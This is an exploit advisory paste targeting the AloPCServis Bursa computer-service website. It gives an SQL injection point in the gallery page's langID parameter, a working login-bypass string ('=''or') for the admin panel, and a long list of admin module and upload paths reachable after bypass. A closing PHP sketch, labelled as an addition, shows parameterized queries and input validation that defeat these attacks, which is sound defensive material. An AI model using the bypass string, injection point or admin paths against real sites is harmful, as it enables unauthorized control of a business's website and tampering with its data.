KingSkrupellos

AloPCServis Bursa Computer Service SQL Injection Bypass

Sep 1st, 2019
###################################################################

# Exploit Title : AloPCServis Bursa Computer Service SQL Injection Authentication Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 01/09/2019
# Vendor Homepage : alopcservis.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Reference Exploit Link : cxsecurity.com/issue/WLB-2019090001
###################################################################

# Impact :
***********
* AloPCServis Bursa Computer Service is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in the application's database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.
* Authentication is any process by which a system verifies the identity of a user who wishes
to access it. When an actor claims to have a given identity, the software does not
prove or insufficiently proves that the claim is correct. Improper authentication
occurs when an application improperly verifies the identity of a user.
Software that incorrectly validates a user's login information lets an attacker
gain certain privileges within the application or disclose sensitive information that allows
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during the Architecture and Design and Implementation stages.

###################################################################

# Admin Panel Login Path :
************************
/admin/login.php

# SQL Injection Exploit :
**********************
/galeriler/index.php?language=tr&langID=[SQL Injection]

# Authentication Bypass Exploit :
*****************************
Admin Username : '=''or'
Admin Password : '=''or'

/admin/index.php?type=1&module=slider

/admin/index.php?type=1&module=slider&sayfa=duzenle&id=282

/admin/index.php?type=1&module=slider&sayfa=yeni

/uploads/images/[yourfilename].png .jpg .gif

/admin/index.php?type=1&module=kurumsal

/admin/index.php?type=1&module=kurumsal&sayfa=duzenle&id=285

/admin/index.php?type=1&module=kurumsal&sayfa=yeni

/admin/index.php?type=2&module=haberler-kategori

/admin/index.php?type=2&module=haberler-kategori&sayfa=duzenle&id=9

/admin/index.php?type=2&module=haberler-kategori&sayfa=yeni

/admin/index.php?type=1&module=haberler

/admin/index.php?type=1&module=haberler&sayfa=duzenle&id=9

/admin/index.php?type=1&module=haberler&sayfa=yeni

/admin/index.php?type=2&module=kategoriler

/admin/index.php?type=2&module=kategoriler&sayfa=duzenle&id=39

/admin/index.php?type=2&module=kategoriler&sayfa=yeni

/admin/index.php?type=3&module=urunler

/admin/index.php?type=3&module=urunler&sayfa=duzenle&id=38

/admin/index.php?type=3&module=urunler&sayfa=yeni

/admin/index.php?type=2&module=galeri-kategori

/admin/index.php?type=2&module=galeri-kategori&sayfa=duzenle&id=45

/admin/index.php?type=2&module=galeri-kategori&sayfa=yeni

/admin/index.php?type=1&module=galeri

/admin/index.php?type=1&module=galeri&sayfa=duzenle&id=286

/admin/index.php?type=1&module=galeri&sayfa=yeni

/admin/index.php?type=0&module=ayarlar

/admin/index.php?type=4&module=tasarim

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################
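
Remediation sketch for the two weaknesses described under "Impact" (an added example, not part of the original advisory and not the vendor's code): user input is bound as a query parameter instead of being concatenated into SQL, and langID is validated as an integer before any query runs. The schema, the in-memory SQLite database and the function names verifyAdmin and galleriesForLang are assumptions made for illustration.

```php
<?php
// Added illustration, not the vendor's code. The schema and the function names
// verifyAdmin / galleriesForLang are hypothetical; data below is constructed.
$pdo = new PDO('sqlite::memory:');   // in-memory stand-in so the example runs offline
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false.
$pdo->exec('CREATE TABLE admins (username TEXT PRIMARY KEY, pass_hash TEXT NOT NULL)');
$pdo->exec('CREATE TABLE galleries (id INTEGER PRIMARY KEY, lang_id INTEGER, title TEXT)');
$pdo->prepare('INSERT INTO admins (username, pass_hash) VALUES (?, ?)')
    ->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);
$pdo->exec("INSERT INTO galleries (id, lang_id, title) VALUES (1, 1, 'Sample gallery')");

// Login: the username is bound as data, so quotes in it cannot reshape the WHERE
// clause, and the password is checked against a stored hash in PHP, not in SQL.
function verifyAdmin(PDO $pdo, $user, $pass): bool
{
    if (!is_string($user) || !is_string($pass)) {
        return false;                       // e.g. array-valued form fields
    }
    $stmt = $pdo->prepare('SELECT pass_hash FROM admins WHERE username = :u');
    $stmt->execute([':u' => $user]);
    $hash = $stmt->fetchColumn();
    return is_string($hash) && password_verify($pass, $hash);
}

// langID: accept only a positive integer, then bind it with an integer type.
function galleriesForLang(PDO $pdo, $langId): ?array
{
    $id = filter_var($langId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;                        // caller answers 400 and logs the request
    }
    $stmt = $pdo->prepare('SELECT id, title FROM galleries WHERE lang_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$quoted = "'=''or'";                        // credential string quoted in the advisory
$checks = [
    'advisory string rejected as credentials' => verifyAdmin($pdo, $quoted, $quoted) === false,
    'valid constructed credentials accepted'  => verifyAdmin($pdo, 'admin', 'constructed-sample-password') === true,
    'non-integer langID rejected'             => galleriesForLang($pdo, $quoted) === null,
    'integer langID returns its rows'         => count(galleriesForLang($pdo, '1')) === 1,
];
foreach ($checks as $label => $ok) {
    echo ($ok ? 'PASS ' : 'FAIL ') . $label . PHP_EOL;
}
```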